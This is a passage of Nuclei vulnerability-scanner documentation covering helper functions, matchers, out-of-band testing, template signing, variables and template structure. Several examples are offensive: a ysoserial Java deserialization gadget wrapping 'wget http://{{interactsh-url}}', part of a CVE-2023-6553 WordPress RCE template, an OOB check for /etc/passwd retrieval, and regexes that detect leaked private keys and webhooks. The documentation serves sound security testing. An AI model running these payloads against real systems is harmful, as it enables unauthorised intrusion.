| to\_unix\_time(input string, layout string) int | Parses a string date time using default or user given layouts, then returns its Unix timestamp | `to_unix_time("2022-01-13T16:30:10+00:00")` `to_unix_time("2022-01-13 16:30:10")` `to_unix_time("13-01-2022 16:30:10", "02-01-2006 15:04:05")` | `1642091410` |
| to\_upper(input string) string | Transforms the input into uppercase characters | `to_upper("hello")` | `HELLO` |
| trim(input, cutset string) string | Returns a slice of the input with all leading and trailing Unicode code points contained in cutset removed | `trim("aaaHelloddd", "ad")` | `Hello` |
| trim\_left(input, cutset string) string | Returns a slice of the input with all leading Unicode code points contained in cutset removed | `trim_left("aaaHelloddd", "ad")` | `Helloddd` |
| trim\_prefix(input, prefix string) string | Returns the input without the provided leading prefix string | `trim_prefix("aaHelloaa", "aa")` | `Helloaa` |
| trim\_right(input, cutset string) string | Returns a string, with all trailing Unicode code points contained in cutset removed | `trim_right("aaaHelloddd", "ad")` | `aaaHello` |
| trim\_space(input string) string | Returns a string, with all leading and trailing white space removed, as defined by Unicode | `trim_space(" Hello ")` | `"Hello"` |
| trim\_suffix(input, suffix string) string | Returns input without the provided trailing suffix string | `trim_suffix("aaHelloaa", "aa")` | `aaHello` |
| unix\_time(optionalSeconds uint) float64 | Returns the current Unix time (number of seconds elapsed since January 1, 1970 UTC) with the added optional seconds | `unix_time(10)` | `1639568278` |
| url\_decode(input string) string | URL decodes the input string | `url_decode("https:%2F%2Fprojectdiscovery.io%3Ftest=1")` | `https://projectdiscovery.io?test=1` |
| url\_encode(input string) string | URL encodes the input string | `url_encode("https://projectdiscovery.io/test?a=1")` | `https%3A%2F%2Fprojectdiscovery.io%2Ftest%3Fa%3D1` |
| wait\_for(seconds uint) | Pauses the execution for the given amount of seconds | `wait_for(10)` | `true` |
| zlib(input string) string | Compresses the input using Zlib | `base64(zlib("Hello"))` | `eJzySM3JyQcEAAD//wWMAfU=` |
| zlib\_decode(input string) string | Decompresses the input using Zlib | `zlib_decode(hex_decode("789cf248cdc9c907040000ffff058c01f5"))` | `Hello` |
| resolve(host string, format string) string | Resolves a host using a dns type that you define | `resolve("localhost",4)` | `127.0.0.1` |
| ip\_format(ip string, format string) string | Takes an input IP and converts it to another format according to this [legend](https://github.com/projectdiscovery/mapcidr/wiki/IP-Format-Index); the second parameter indicates the conversion index and must be between 1 and 11 | `ip_format("127.0.0.1", 3)` | `0177.0.0.01` |
## Deserialization helper functions
Nuclei allows payload generation for a few common gadgets from [ysoserial](https://github.com/frohoff/ysoserial).
**Supported Payload:**
* `dns` (URLDNS)
* `commons-collections3.1`
* `commons-collections4.0`
* `jdk7u21`
* `jdk8u20`
* `groovy1`
**Supported encodings:**
* `base64` (default)
* `gzip-base64`
* `gzip`
* `hex`
* `raw`
**Deserialization helper function format:**
```yaml
{{ generate_java_gadget(payload, cmd, encoding) }}
```
**Deserialization helper function example:**
```yaml
{{generate_java_gadget("commons-collections3.1", "wget http://{{interactsh-url}}", "base64")}}
```
## JSON helper functions
Nuclei allows manipulating JSON strings in different ways. Here is a list of its functions:
* `generate_jwt`, to generate a JSON Web Token (JWT) using the claims provided in a JSON string, the signature, and the specified algorithm.
* `json_minify`, to minify a JSON string by removing unnecessary whitespace.
* `json_prettify`, to prettify a JSON string by adding indentation.
**Examples**
**`generate_jwt`**
To generate a JSON Web Token (JWT), at a minimum you have to supply the JSON that you want to sign.
Here is a list of supported algorithms for generating JWTs with the `generate_jwt` function *(case-insensitive)*:
* `HS256`
* `HS384`
* `HS512`
* `RS256`
* `RS384`
* `RS512`
* `PS256`
* `PS384`
* `PS512`
* `ES256`
* `ES384`
* `ES512`
* `EdDSA`
* `NONE`
Empty string ("") also means `NONE`.
Format:
```yaml
{{ generate_jwt(json, algorithm, signature, maxAgeUnix) }}
```
> Arguments other than `json` are optional.
Example:
```yaml
variables:
json: | # required
{
"foo": "bar",
"name": "John Doe"
}
alg: "HS256" # optional
sig: "this_is_secret" # optional
age: '{{to_unix_time("2032-12-30T16:30:10+00:00")}}' # optional
jwt: '{{generate_jwt(json, "{{alg}}", "{{sig}}", "{{age}}")}}'
```
> The `maxAgeUnix` argument sets the expiration `"exp"` JWT standard claim; the `"iat"` claim is also set at the time the function is called.
**`json_minify`**
Format:
```yaml
{{ json_minify(json) }}
```
Example:
```yaml
variables:
json: |
{
"foo": "bar",
"name": "John Doe"
}
minify: "{{json_minify(json}}"
```
`minify` variable output:
```json
{ "foo": "bar", "name": "John Doe" }
```
**`json_prettify`**
Format:
```yaml
{{ json_prettify(json) }}
```
Example:
```yaml
variables:
json: '{"foo":"bar","name":"John Doe"}'
pretty: "{{json_prettify(json}}"
```
`pretty` variable output:
```json
{
"foo": "bar",
"name": "John Doe"
}
```
**`resolve`**
Format:
```yaml
{{ resolve(host, format) }}
```
Here is a list of the formats available for the DNS type:
* `4` or `a`
* `6` or `aaaa`
* `cname`
* `ns`
* `txt`
* `srv`
* `ptr`
* `mx`
* `soa`
* `caa`
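For instance, `resolve` could be used inside a template variable to look up a record at runtime; a minimal sketch (the hostname below is illustrative):
```yaml
variables:
  # hypothetical host; stores the CNAME record of the host in the variable
  cname_target: '{{resolve("www.projectdiscovery.io", "cname")}}'
```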
## Examples
For more examples, see the [helper function examples](/templates/reference/helper-functions-examples)
# Javascript Helper Functions
Source: https://docs.projectdiscovery.io/templates/reference/js-helper-functions
Available JS Helper Functions that can be used in global js runtime & protocol specific helpers.
## Javascript Runtime
| Name | Description | Signatures |
| -------------- | -------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------- |
| atob | Base64 decodes a given string | `atob(string) string` |
| btoa | Base64 encodes a given string | `btoa(string) string` |
| to\_json | Converts a given object to JSON | `to_json(any) object` |
| dump\_json | Prints a given object as JSON in console | `dump_json(any)` |
| to\_array | Sets/Updates objects prototype to array to enable Array.XXX functions | `to_array(any) array` |
| hex\_to\_ascii | Converts a given hex string to ascii | `hex_to_ascii(string) string` |
| Rand | Rand returns a random byte slice of length n | `Rand(n int) []byte` |
| RandInt | RandInt returns a random int | `RandInt() int` |
| log | log prints given input to stdout with \[JS] prefix for debugging purposes | `log(msg string)`, `log(msg map[string]interface{})` |
| getNetworkPort | getNetworkPort registers defaultPort and returns defaultPort if it is a colliding port with other protocols | `getNetworkPort(port string, defaultPort string) string` |
| isPortOpen | isPortOpen checks if given TCP port is open on host. timeout is optional and defaults to 5 seconds | `isPortOpen(host string, port string, [timeout int]) bool` |
| isUDPPortOpen | isUDPPortOpen checks if the given UDP port is open on the host. Timeout is optional and defaults to 5 seconds. | `isUDPPortOpen(host string, port string, [timeout int]) bool` |
| ToBytes | ToBytes converts given input to byte slice | `ToBytes(...interface{}) []byte` |
| ToString | ToString converts given input to string | `ToString(...interface{}) string` |
| Export | Converts a given value to a string and is appended to output of script | `Export(value any)` |
| ExportAs | Exports given value with specified key and makes it available in DSL and response | `ExportAs(key string,value any)` |
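As a rough illustration, here is a minimal `javascript` protocol sketch that exercises a few of the runtime helpers above (`isPortOpen`, `log`, `Export`); the id, port, and matcher values are placeholders rather than an official template:
```yaml
id: js-helpers-example

info:
  name: JS Helpers Example
  author: pdteam
  severity: info

javascript:
  - code: |
      // check TCP reachability of the target port (timeout defaults to 5 seconds)
      var open = isPortOpen(Host, Port);
      log(open);     // debug print to stdout with the [JS] prefix
      Export(open);  // append the value to the script output
    args:
      Host: "{{Host}}"
      Port: "22"

    matchers:
      - type: word
        words:
          - "true"
```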
## Template Flow
| Name | Description | Signatures |
| ------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ----------------------- |
| log | Logs a given object/message to stdout (only for debugging purposes) | `log(obj any) any` |
| iterate | Normalizes and iterates over all arguments (can be a string, array, null, etc.) and returns an array of objects. Note: if the object type is unknown (i.e. it could be a string or an array), iterate should be used and it will always return an array of strings | `iterate(...any) []any` |
| Dedupe | De-duplicates given values and returns a new array of unique values | `new Dedupe()` |
## Code Protocol
| Name | Description | Signatures |
| --------- | --------------------------------------------------- | ------------------ |
| OS | OS returns the current OS | `OS() string` |
| IsLinux | IsLinux checks if the current OS is Linux | `IsLinux() bool` |
| IsWindows | IsWindows checks if the current OS is Windows | `IsWindows() bool` |
| IsOSX | IsOSX checks if the current OS is OSX | `IsOSX() bool` |
| IsAndroid | IsAndroid checks if the current OS is Android | `IsAndroid() bool` |
| IsIOS | IsIOS checks if the current OS is IOS | `IsIOS() bool` |
| IsJS | IsJS checks if the current OS is JS | `IsJS() bool` |
| IsFreeBSD | IsFreeBSD checks if the current OS is FreeBSD | `IsFreeBSD() bool` |
| IsOpenBSD | IsOpenBSD checks if the current OS is OpenBSD | `IsOpenBSD() bool` |
| IsSolaris | IsSolaris checks if the current OS is Solaris | `IsSolaris() bool` |
| Arch | Arch returns the current architecture | `Arch() string` |
| Is386 | Is386 checks if the current architecture is 386 | `Is386() bool` |
| IsAmd64 | IsAmd64 checks if the current architecture is Amd64 | `IsAmd64() bool` |
| IsARM | IsArm checks if the current architecture is Arm | `IsARM() bool` |
| IsARM64 | IsArm64 checks if the current architecture is Arm64 | `IsARM64() bool` |
| IsWasm | IsWasm checks if the current architecture is Wasm | `IsWasm() bool` |
## JavaScript Protocol
| Name | Description | Signatures |
| ------------- | ---------------------------------------------------------------------------------------------- | ------------------------------------ |
| set | set variable from init code. this function is available in init code block only | `set(string, interface{})` |
| updatePayload | update/override any payload from init code. this function is available in init code block only | `updatePayload(string, interface{})` |
# Matchers
Source: https://docs.projectdiscovery.io/templates/reference/matchers
Review details on matchers for Nuclei
Matchers allow different types of flexible comparisons on protocol responses. They are what make Nuclei so powerful: checks are very simple to write, and multiple checks can be combined as needed for very effective scanning.
### Types
Multiple matchers can be specified in a request. There are basically 7 types of matchers:
| Matcher Type | Part Matched |
| ------------ | --------------------------- |
| status | Integer Comparisons of Part |
| size | Content Length of Part |
| word | Part for a protocol |
| regex | Part for a protocol |
| binary | Part for a protocol |
| dsl | Part for a protocol |
| xpath | Part for a protocol |
To match status codes for responses, you can use the following syntax.
```yaml
matchers:
# Match the status codes
- type: status
# Some status codes we want to match
status:
- 200
- 302
```
To match binary for hexadecimal responses, you can use the following syntax.
```yaml
matchers:
- type: binary
binary:
- "504B0304" # zip archive
- "526172211A070100" # RAR archive version 5.0
- "FD377A585A0000" # xz tar.xz archive
condition: or
part: body
```
Matchers also support hex encoded data which will be decoded and matched.
```yaml
matchers:
- type: word
encoding: hex
words:
- "50494e47"
part: body
```
**Word** and **Regex** matchers can be further configured depending on the needs of the users.
**XPath** matchers use XPath queries to match XML and HTML responses. If the XPath query returns any results, it's considered a match.
```yaml
matchers:
- type: xpath
part: body
xpath:
- "/html/head/title[contains(text(), 'Example Domain')]"
```
Complex matchers of type **dsl** allow building more elaborate expressions with helper functions. These functions provide access to the protocol response, which contains a variety of data depending on the protocol. See the protocol-specific documentation to learn about the different returned results.
```yaml
matchers:
- type: dsl
dsl:
- "len(body)<1024 && status_code==200" # Body length less than 1024 and 200 status code
- "contains(toupper(body), md5(cookie))" # Check if the MD5 sum of cookies is contained in the uppercase body
```
Every part of a protocol response can be matched with a DSL matcher. Some examples:
| Response Part | Description | Example |
| --------------- | ----------------------------------------------- | ----------------------- |
| content\_length | Content-Length Header | content\_length >= 1024 |
| status\_code | Response Status Code | status\_code==200 |
| all\_headers | Unique string containing all headers | len(all\_headers) |
| body | Body as string | len(body) |
| header\_name | Lowercase header name with `-` converted to `_` | len(user\_agent) |
| raw | Headers + Response | len(raw) |
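For instance, several of these response parts can be combined in a single **dsl** matcher (the values below are illustrative):
```yaml
matchers:
  - type: dsl
    dsl:
      - "content_length >= 1024"                          # Content-Length header
      - "contains(to_lower(all_headers), 'x-powered-by')" # any header containing X-Powered-By
    condition: and
```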
### Conditions
Multiple words and regexes can be specified in a single matcher and can be configured with different conditions like **AND** and **OR**.
1. **AND** - Using the AND condition requires all the words from the matcher's list to be present. The request is marked as successful only when every word has been matched.
2. **OR** - Using the OR condition requires only a single word from the matcher's list. The request is marked as successful as soon as any one word is matched.
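For example, a word matcher using the OR condition only needs one of the listed words to appear in the body (the words here are illustrative):
```yaml
matchers:
  - type: word
    words:
      - "admin"
      - "login"
    # a single match from the list is enough
    condition: or
    part: body
```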
### Matched Parts
Multiple parts of the response can also be matched for the request; the default matched part is `body` if not defined.
Example matchers for HTTP response body using the AND condition:
```yaml
matchers:
# Match the body word
- type: word
# Some words we want to match
words:
- "[core]"
- "[config]"
# Both words must be found in the response body
condition: and
# We want to match request body (default)
part: body
```
Similarly, matchers can be written to match anything that you want to find in the response body allowing unlimited creativity and extensibility.
### Negative Matchers
All types of matchers also support negative conditions, which are mostly useful when you look for a match with exclusions. This can be used by adding `negative: true` in the **matchers** block.
Here is an example syntax using the `negative` condition; this will return all the URLs that do not have `PHPSESSID` in the response header.
```yaml
matchers:
- type: word
words:
- "PHPSESSID"
part: header
negative: true
```
### Multiple Matchers
Multiple matchers can be used in a single template to fingerprint multiple conditions with a single request.
Here is an example of syntax for multiple matchers.
```yaml
matchers:
- type: word
name: php
words:
- "X-Powered-By: PHP"
- "PHPSESSID"
part: header
- type: word
name: node
words:
- "Server: NodeJS"
- "X-Powered-By: nodejs"
condition: or
part: header
- type: word
name: python
words:
- "Python/2."
- "Python/3."
condition: or
part: header
```
### Matchers Condition
When using multiple matchers, the default condition is an OR operation between all the matchers. An AND operation can be used to return a result only if all matchers return true.
```yaml
matchers-condition: and
matchers:
- type: word
words:
- "X-Powered-By: PHP"
- "PHPSESSID"
condition: or
part: header
- type: word
words:
- "PHP"
part: body
```
### Internal Matchers
When writing multi-protocol or `flow`-based templates, there may be a case where we need to validate/match the first request before proceeding to the next one. A good example of this is [`CVE-2023-6553`](https://github.com/projectdiscovery/nuclei-templates/blob/c5be73e328ebd9a0c122ea0324f60bbdd7eb940d/http/cves/2023/CVE-2023-6553.yaml#L21).
In this template, we first check whether the target is actually using the `Backup Migration` plugin with matchers, and only if that is true do we proceed to the next request with the help of `flow`.
However, this would print two results, one for each request match. Since the first request's matchers are only a pre-condition for the next request, we can mark them as internal using `internal: true` in the matchers block.
```yaml
id: CVE-2023-6553
info:
name: WordPress Backup Migration <= 1.3.7 - Unauthenticated Remote Code Execution
author: FLX
severity: critical
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/backup-backup/readme.txt"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "Backup Migration")'
condition: and
internal: true # <- updated logic (this will skip printing this event/result)
- method: POST
path:
- "{{BaseURL}}/wp-content/plugins/backup-backup/includes/backup-heart.php"
headers:
Content-Dir: "{{rand_text_alpha(10)}}"
matchers:
- type: dsl
dsl:
- 'len(body) == 0'
- 'status_code == 200'
- '!contains(body, "Incorrect parameters")'
condition: and
```
### Global Matchers
Global matchers are essentially `matchers` that apply globally across all HTTP responses received from running other templates. This makes them super useful for things like passive detection, fingerprinting, spotting errors, WAF detection, identifying unusual behaviors, or even catching secrets and information leaks. By setting `global-matchers` to **true**, you're enabling the template to automatically match events triggered by other templates without having to configure them individually.
* Global matchers only work with [HTTP-protocol-based](/templates/protocols/http) templates.
* When global matchers are enabled, no requests defined in the template will be sent.
* This feature is not limited to `matchers`; you can also define `extractors` in a global matchers template.
Let's look at a quick example of how this works:
```yaml
# http-template-with-global-matchers.yaml
http:
- global-matchers: true
matchers-condition: or
matchers:
- type: regex
name: asymmetric_private_key
regex:
- '-----BEGIN ((EC|PGP|DSA|RSA|OPENSSH) )?PRIVATE KEY( BLOCK)?-----'
part: body
- type: regex
name: slack_webhook
regex:
- >-
https://hooks.slack.com/services/T[a-zA-Z0-9_]{8,10}/B[a-zA-Z0-9_]{8,12}/[a-zA-Z0-9_]{23,24}
part: body
```
In this example, we're using a template that has `global-matchers` set to **true**. It looks for specific patterns, like an asymmetric private key or a Slack webhook, across all HTTP requests. Now, when you run this template along with others, the global matcher will automatically check for those patterns in all HTTP responses. You don't have to set up individual matchers in every single template for it to work.
To run it, use a command like this:
```console
> nuclei -egm -u http://example.com -t http-template-with-global-matchers.yaml -t http-template-1.yaml -t http-template-2.yaml -silent
[http-template-with-global-matchers:asymmetric_private_key] http://example.com/request-from-http-template-1
[http-template-with-global-matchers:slack_webhook] http://example.com/request-from-http-template-2
```
Global matchers are NOT applied by default. You need to explicitly enable them using the `-enable-global-matchers`/`-egm` flag or programmatically via [`nuclei.EnableGlobalMatchersTemplates`](https://pkg.go.dev/github.com/projectdiscovery/nuclei/v3/lib#EnableGlobalMatchersTemplates) if you're working with the Nuclei SDK.
In this case, the global matchers are looking for an asymmetric private key and a Slack webhook. As you can see in the output, it found a match in requests from the other templates, even though the matching logic was only defined once in the global matchers template. This makes it really efficient for detecting patterns across multiple requests without duplicating code in every single template.
# OOB Testing
Source: https://docs.projectdiscovery.io/templates/reference/oob-testing
Understanding OOB testing with Nuclei Templates
Since the release of [Nuclei v2.3.6](https://github.com/projectdiscovery/nuclei/releases/tag/v2.3.6), Nuclei supports using the [interactsh](https://github.com/projectdiscovery/interactsh) API to achieve OOB-based vulnerability scanning with automatic request correlation built in. It's as easy as writing `{{interactsh-url}}` anywhere in the request and adding a matcher for `interactsh_protocol`. Nuclei handles correlation of the interaction to the template and the request it was generated from, allowing effortless OOB scanning.
## Interactsh Placeholder
The `{{interactsh-url}}` placeholder is supported in **http** and **network** requests.
An example of a Nuclei request with `{{interactsh-url}}` placeholders is provided below. These are replaced at runtime with unique interactsh URLs.
```yaml
- raw:
- |
GET /plugins/servlet/oauth/users/icon-uri?consumerUri=https://{{interactsh-url}} HTTP/1.1
Host: {{Hostname}}
```
## Interactsh Matchers
Interactsh interactions can be used with a `word`, `regex` or `dsl` matcher/extractor using the following parts.
| part |
| -------------------- |
| interactsh\_protocol |
| interactsh\_request |
| interactsh\_response |
**interactsh\_protocol**
The value can be dns, http or smtp. This is the standard matcher for every interactsh-based template, with DNS often being the common value as it is very non-intrusive in nature.
**interactsh\_request**
The request that the interactsh server received.
**interactsh\_response**
The response that the interactsh server sent to the client.
Example of Interactsh DNS Interaction matcher:
```yaml
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
```
Example of HTTP Interaction matcher + word matcher on Interaction content
```yaml
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
- type: regex
part: interactsh_request # Confirms the retrieval of /etc/passwd file
regex:
- 'root:.*:0:0:'
```
# Preprocessors
Source: https://docs.projectdiscovery.io/templates/reference/preprocessors
Review details on pre-processors for Nuclei
Certain pre-processors can be specified globally anywhere in the template. They run as soon as the template is loaded, to achieve things like random IDs generated for each template run.
### randstr
Generates a [random ID](https://github.com/rs/xid) for a template on each nuclei run. This can be used anywhere in the template and will always contain the same value. `randstr` can be suffixed by a number, and new random IDs will be created for those names too, e.g. `{{randstr_1}}`, which will also remain the same across the template.
`randstr` is also supported within matchers and can be used to match the inputs.
For example:
```yaml
http:
- method: POST
path:
- "{{BaseURL}}/level1/application/"
headers:
cmd: echo '{{randstr}}'
matchers:
- type: word
words:
- '{{randstr}}'
```
# Template Signing
Source: https://docs.projectdiscovery.io/templates/reference/template-signing
Review details on template signing for Nuclei
Template signing via the private-public key mechanism is a crucial aspect of ensuring the integrity, authenticity, and security of templates. This mechanism involves the use of asymmetric cryptography, specifically the Elliptic Curve Digital Signature Algorithm (ECDSA), to create a secure and verifiable signature.
In this process, a template author generates a private key that remains confidential and securely stored. The corresponding public key is then shared with the template consumers. When a template is created or modified, the author signs it using their private key, generating a unique signature that is attached to the template.
Template consumers can verify the authenticity and integrity of a signed template by using the author's public key. By applying the appropriate cryptographic algorithm (ECDSA), they can validate the signature and ensure that the template has not been tampered with since it was signed. This provides a level of trust, as any modifications or unauthorized changes to the template would result in a failed verification process.
By employing the private-public key mechanism, template signing adds an additional layer of security and trust to the template ecosystem. It helps establish the identity of the template author and ensures that the templates used in various systems are genuine and have not been altered maliciously.
**What does signing a template mean?**
Template signing is a mechanism to ensure the integrity and authenticity of templates. The primary goal is to provide template writers and consumers a way to trust crowdsourced or custom templates ensuring that they are not tampered with.
All [official Nuclei templates](https://github.com/projectdiscovery/nuclei-templates) include a digital signature and are verified by Nuclei while loading templates using ProjectDiscovery's public key (shipped with the Nuclei binary).
Individuals or organizations running Nuclei in their work environment can generate their own key-pair with `nuclei` and sign their custom templates with their private key, thus ensuring that only authorized templates are being used in their environment.
This also allows entities to fully utilize the power of new protocols like `code` without worrying about malicious custom templates being used in their environment.
**NOTE:**
* **Template signing is optional for all protocols except `code`**.
* **Unsigned code templates are disabled and cannot be executed using Nuclei**.
* **Only signed code templates by the author (yourself) or ProjectDiscovery can be executed.**
* **Template signing is primarily introduced to ensure the security of templates that run code on the host machine.**
* Code file references (for example: `source: protocols/code/pyfile.py`) are allowed and content of these files is included in the template digest.
* Payload file references (for example: `payloads: protocols/http/params.txt`) are not included in the template digest, as they are treated as payloads/helpers and not actual code that is being executed.
* Template signing is deterministic for both signing and verifying a template, i.e. if a code file referenced in a template is present outside the templates directory and signed with the `-lfa` flag, then verification will fail if the same template is used without the `-lfa` (local file access) flag. (Note this only applies to the `-lfa` flag.)
### Signing Custom Template
The simplest and recommended way to generate a key-pair and sign/verify templates is to use `nuclei` itself.
When signing a template, if a key-pair does not exist, Nuclei will prompt the user to generate a new one.
```console
$ ./nuclei -t templates.yaml -sign
[INF] Generating new key-pair for signing templates
[*] Enter User/Organization Name (exit to abort) : acme
[*] Enter passphrase (exit to abort):
[*] Enter same passphrase again:
[INF] Successfully generated new key-pair for signing templates
```
> **Note:** The passphrase is optional and can be left blank. When provided, the private key is encrypted with the passphrase using the PEMCipherAES256 algorithm.
Once a key-pair is generated, you can sign any custom template using the `-sign` flag as shown below.
```console
$ ./nuclei -t templates.yaml -sign
[INF] All templates signatures were elaborated success=1 failed=0
```
> **Note:** Every time you make any change in your code template, you need to re-sign it to run with Nuclei.
### Template Digest and Signing Keys
When a template is signed, a digest is generated and added to the template. This digest is a hash of the template content and is used to verify the integrity of the template. If the template is modified after signing, the digest will change, and the signature verification will fail during template loading.
```yaml
# digest: 4a0a00473045022100eb01da6b97893e7868c584f330a0cd52df9bddac005860bb8595ba5b8aed58c9022050043feac68d69045cf320cba9298a2eb2e792ea4720d045d01e803de1943e7d:4a3eb6b4988d95847d4203be25ed1d46
```
The digest is in the format of `signature:fragment`, where the signature is the digital signature of the template used to verify its integrity, and the fragment is metadata generated by MD5 hashing the public key to disable re-signing of code templates not written by you.
The key-pair generated by Nuclei is stored in two files in the `$CONFIG/nuclei/keys` directory, where `$CONFIG` is the system-specific config directory. The private key is stored in `nuclei-user-private-key.pem`, which is encrypted with a passphrase if provided. The public key is stored in `nuclei-user.crt`, which includes the public key and identifier (e.g., user/org name) in a self-signed certificate.
```bash
$ ls -la ~/.config/nuclei/keys
total 16
-rw------- 1 tarun staff 251B Oct 4 21:45 nuclei-user-private-key.pem # encrypted private key with passphrase
-rw------- 1 tarun staff 572B Oct 4 21:45 nuclei-user.crt # self signed certificate which includes public key and identifier (i.e user/org name)
```
To use the public key for verification, you can either copy it to the `$CONFIG/nuclei/keys` directory on another user's machine, or set the `NUCLEI_USER_CERTIFICATE` environment variable to the path or content of the public key.
To use the private key, you can copy it to the `$CONFIG/nuclei/keys` directory on another user's machine, or set the `NUCLEI_USER_PRIVATE_KEY` environment variable to the path or content of the private key.
```console
$ export NUCLEI_USER_CERTIFICATE=$(cat path/to/nuclei-user.crt)
$ export NUCLEI_USER_PRIVATE_KEY=$(cat path/to/nuclei-user-private-key.pem)
```
It's important to note that you are responsible for securing and managing the private key, and Nuclei has no accountability for any loss of the private key.
By default, Nuclei loads the user certificate (public key) from the default locations mentioned above and uses it to verify templates. When running, Nuclei will execute signed templates, warn about executing unsigned custom templates, and block unsigned code templates. You can disable this warning by setting the `HIDE_TEMPLATE_SIG_WARNING` environment variable to `true`.
## FAQ
**Found X unsigned or tampered code template?**
```bash
./nuclei -u scanme.sh -t simple-code.yaml
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.0.0-dev
projectdiscovery.io
[WRN] Found 1 unsigned or tampered code template (carefully examine before using it & use -sign flag to sign them)
[INF] Current nuclei version: v3.0.0-dev (development)
[INF] Current nuclei-templates version: v9.6.4 (latest)
[WRN] Executing 1 unsigned templates. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] No results found. Better luck next time!
[FTL] Could not run nuclei: no templates provided for scan
```
Here `simple-code.yaml` is a code protocol template that is either not signed or whose content has been modified after signing, which indicates a loss of template integrity.
If you are the template writer, you can go ahead and sign the template using the `-sign` flag. If you are a template consumer, you should carefully examine the template before signing it.
**Re-signing code templates are not allowed for security reasons?**
```bash
nuclei -u scanme.sh -t simple-code.yaml -sign
[ERR] could not sign 'simple-code.yaml': [signer:RUNTIME] re-signing code templates are not allowed for security reasons.
[INF] All templates signatures were elaborated success=0 failed=1
```
The error message `re-signing code templates are not allowed for security reasons` comes from the Nuclei engine. This error indicates that the code template was initially signed by another user and someone is now trying to re-sign it.
This measure was implemented to prevent running untrusted templates unknowingly, which might lead to potential security issues.
When you encounter this error, it suggests that you're dealing with a template that has been signed by another user. Likely, the original signer is not you or the ProjectDiscovery team.
By default, Nuclei disallows executing code templates that are signed by anyone other than you or from the public templates provided by projectdiscovery/nuclei-templates.
This is done to prevent potential security abuse using code templates.
To resolve this error:
1. Open and thoroughly examine the code template for any modifications.
2. Manually remove the existing digest signature from the template.
3. Sign the template again.
This way, you can ensure that only templates verified and trusted by you (or projectdiscovery) are run, thus maintaining a secure environment.
# Variables
Source: https://docs.projectdiscovery.io/templates/reference/variables
Review details on variables for Nuclei
Variables can be used to declare some values which remain constant throughout the template. The value of the variable once calculated does not change. Variables can be either simple strings or DSL helper functions. If the variable is a helper function, it is enclosed in double-curly brackets `{{}}`. Variables are declared at template level.
Example variables -
```yaml
variables:
a1: "test" # A string variable
a2: "{{to_lower(rand_base(5))}}" # A DSL function variable
```
Currently, `dns`, `http`, `headless` and `network` protocols support variables.
Example of templates with variables -
```yaml
# Variable example using HTTP requests
id: variables-example
info:
name: Variables Example
author: pdteam
severity: info
variables:
a1: "value"
a2: "{{base64('hello')}}"
http:
- raw:
- |
GET / HTTP/1.1
Host: {{FQDN}}
Test: {{a1}}
Another: {{a2}}
stop-at-first-match: true
matchers-condition: or
matchers:
- type: word
words:
- "value"
- "aGVsbG8="
```
```yaml
# Variable example for network requests
id: variables-example
info:
name: Variables Example
author: pdteam
severity: info
variables:
a1: "PING"
a2: "{{base64('hello')}}"
tcp:
- host:
- "{{Hostname}}"
inputs:
- data: "{{a1}}"
read-size: 8
matchers:
- type: word
part: data
words:
- "{{a2}}"
```
# Nuclei Template Structure
Source: https://docs.projectdiscovery.io/templates/structure
Learn the common elements required to create a Nuclei Template
# Template Structure
Nuclei Templates use a custom YAML-based DSL, with their structure varying according to the specific protocol employed. Typically, a template comprises the following elements:
* A [unique ID](#id) for the template
* Essential [information](#information) and [metadata](#metadata) relevant to the template
* The designated protocol, such as [HTTP](/templates/protocols/http/basic-http), [DNS](/templates/protocols/dns), [File](/templates/protocols/file), etc.
* Details specific to the chosen protocol, like the requests made in the HTTP protocol
* A series of [matchers](/templates/reference/matchers) to ascertain the presence of findings
* Necessary [extractors](/templates/reference/extractors) for data retrieval from the results
For a detailed, automatically generated overview of everything available in the Nuclei template syntax, you can visit the [syntax reference](https://github.com/projectdiscovery/nuclei/blob/dev/SYNTAX-REFERENCE.md) on GitHub.
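To show how these elements fit together, here is a minimal illustrative HTTP template; the id, path, and matched values are placeholders rather than a real check:
```yaml
id: example-structure

info:
  name: Example Template Structure
  author: pdteam
  severity: info
  description: Minimal template showing the common structural elements.
  tags: example

http:
  - method: GET
    path:
      - "{{BaseURL}}/example"

    # matchers decide whether the response counts as a finding
    matchers:
      - type: word
        words:
          - "example"

    # extractors pull data out of the matched response
    extractors:
      - type: regex
        part: body
        regex:
          - 'version=([0-9.]+)'
```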
## ID
Each template has a unique ID which is used during output writing to specify the template name for an output line.
The template file uses the **YAML** extension. Template files can be created in any text editor of your choice.
```yaml
id: git-config
```
ID must not contain spaces. This is done to allow easier output parsing.
## Information
The next important piece of information about a template is the **info** block. The info block provides **name**, **author**, **severity**, **description**, **reference**, **tags**, and `metadata`. The **severity** field indicates the severity of the template. The **info** block also supports dynamic fields, so one can define any number of `key: value` pairs to provide more useful information about the template. **reference** is another popular field to define external reference links for the template.
Another useful field to always add in the `info` block is **tags**. This allows you to assign custom tags to a template depending on its purpose, like `cve`, `rce`, etc. This allows Nuclei to identify templates with your input tags and only run them.
Example of an info block -
```yaml
info:
name: Git Config File Detection Template
author: Ice3man
severity: medium
description: Searches for the pattern /.git/config on passed URLs.
reference: https://www.acunetix.com/vulnerabilities/web/git-repository-found/
tags: git,config
```
Actual requests and corresponding matchers are placed below the info block; they perform the task of making requests to target servers and determining whether the template request was successful.
Each template file can contain multiple requests to be made. The template is iterated and one by one the desired requests are made to the target sites.
The best part of this is you can simply share your crafted template with your teammates, triage/security team to replicate the issue on the other side with ease.
## Metadata
It's possible to add metadata nodes, for example, to integrate with [uncover](https://github.com/projectdiscovery/uncover) (see [Uncover Integration](https://docs.projectdiscovery.io/tools/nuclei/running#scan-on-internet-database)).
The metadata nodes are crafted this way: `<engine>-query: '<query>'` where:
* `<engine>` is the search engine, equivalent to the value of the `-ue` option of nuclei or the `-e` option of uncover
* `<query>` is the search query, equivalent to the value of the `-uq` option of nuclei or the `-q` option of uncover
For example, for Shodan:
```yaml
info:
metadata:
shodan-query: 'vuln:CVE-2021-26855'
```
# Workflow Examples
Source: https://docs.projectdiscovery.io/templates/workflows/examples
